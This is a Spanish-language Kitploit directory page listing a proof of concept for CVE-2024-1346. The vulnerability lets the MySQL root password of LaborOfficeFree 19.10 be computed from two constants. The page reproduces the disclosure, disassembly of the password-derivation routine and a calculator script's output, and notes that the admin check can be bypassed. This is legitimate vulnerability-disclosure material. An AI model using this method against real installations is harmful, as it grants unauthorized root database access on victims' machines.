Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-1346 — Contraseña débil de root de la base de datos MySQL en LaborOfficeFree afecta a la versión 19.10. Esta vulnerabilidad permite a un atacante calcular la contraseña de root de la base de datos MySQL utilizada por LaborOfficeFree usando dos constantes. | Kitploit
Herramientas/GitHubGitHub/petergabaldon/cve-2024-1346
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónIngeniería InversaAnálisis de BinariosSeguridad de Bases de Datos
GitHubpetergabaldon/cve-2024-1346

CVE-2024-1346

Contraseña débil de root de la base de datos MySQL en LaborOfficeFree afecta a la versión 19.10. Esta vulnerabilidad permite a un atacante calcular la contraseña de root de la base de datos MySQL utilizada por LaborOfficeFree usando dos constantes.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
2hace 2 añosAún no revisado

CVE-2024-1346

Contraseña débil de la base de datos MySQL root en LaborOfficeFree afecta a la versión 19.10. Esta vulnerabilidad permite a un atacante calcular la contraseña root de la base de datos MySQL utilizada por LaborOfficeFree usando dos constantes.

Exploit Title: LaborOfficeFree 19.10 MySQL Root Password Calculator - CVE-2024-1346

Google Dork: N/A

Date: 09/02/2023

Exploit Author: Peter Gabaldon - https://pgj11.com/

Vendor Homepage: https://www.laborofficefree.com/

Software Link: https://www.laborofficefree.com/#plans

Version: 19.10

Tested on: Windows 10

CVE : CVE-2024-1346

Description: LaborOfficeFree instala una instancia de MySQL que se ejecuta como SYSTEM y calcula la contraseña root de MySQL basándose en dos constantes. Cada vez que el programa necesita conectarse a MySQL como root, emplea el algoritmo inverso para calcular la contraseña root. Este problema se ha probado exclusivamente en la versión 19.10, pero supuestamente, las versiones anteriores a la 19.10 también son vulnerables.

root@kitploit:~
	After installing LaborOfficeFree in testing lab and revesing the backup process, it is possible to determine that it creates a "mysqldump.exe" process with the root user and the password being derived from the string "hola" concated with "00331-20471-98465-AA370" (in this case). This appears to be the license, but it is different from the license shown in the GUI dashboard. This license has to be extracted from memory. From example, attaching a debugger and breaking in the mysqldump process (for that, admin rights are NOT needed).

    Also, the app checks if you are an admin to perform the backup and fails if the program is not running as adminsitrator. But, this check is not effective, as it is actually calling mysqldump with a derived password. Thus, administrator right are not needed. 

    Here is the disassembly piece of the procedure in LaborOfficeFree.exe responsible of calculating the root password.

    00506548 | 53                       | push ebx                                | Aqui se hacen el XOR y demas que calcula la pwd :)
    00506549 | 56                       | push esi                                |
    0050654A | A3 7CFD8800              | mov dword ptr ds:[88FD7C],eax           | eax:"hola00331-20471-98465-AA370"
    0050654F | 0FB7C2                   | movzx eax,dx                            | eax:"hola00331-20471-98465-AA370"
    00506552 | 85C0                     | test eax,eax                            | eax:"hola00331-20471-98465-AA370"
    00506554 | 7E 2E                    | jle laborofficefree.506584              |
    00506556 | BA 01000000              | mov edx,1                               |
    0050655B | 8B1D 7CFD8800            | mov ebx,dword ptr ds:[88FD7C]           |
    00506561 | 0FB65C13 FF              | movzx ebx,byte ptr ds:[ebx+edx-1]       |
    00506566 | 8B31                     | mov esi,dword ptr ds:[ecx]              |
    00506568 | 81E6 FF000000            | and esi,FF                              |
    0050656E | 33DE                     | xor ebx,esi                             |
    00506570 | 8B1C9D A40B8800          | mov ebx,dword ptr ds:[ebx*4+880BA4]     |
    00506577 | 8B31                     | mov esi,dword ptr ds:[ecx]              |
    00506579 | C1EE 08                  | shr esi,8                               |
    0050657C | 33DE                     | xor ebx,esi                             |
    0050657E | 8919                     | mov dword ptr ds:[ecx],ebx              |
    00506580 | 42                       | inc edx                                 |
    00506581 | 48                       | dec eax                                 | eax:"hola00331-20471-98465-AA370"
    00506582 | 75 D7                    | jne laborofficefree.50655B              |
    00506584 | 5E                       | pop esi                                 |
    00506585 | 5B                       | pop ebx                                 |
    00506586 | C3                       | ret                                     | 

    The result number from this procedure is then negated (bitwise NOT) and casted as a signed integer. Note: the address 0x880BA4 stores a constant array of 256 DWORDs entries.

    005065C8 | F755 F8                  | not dword ptr ss:[ebp-8]                |


	Running this script produces the root password of the LaborOfficeFree MySQL.

    C:\Users\***\Desktop>python myLaborRootPwdCalculator.py
    1591779762
    
    C:\Users\***\Desktop>
Descargar herramienta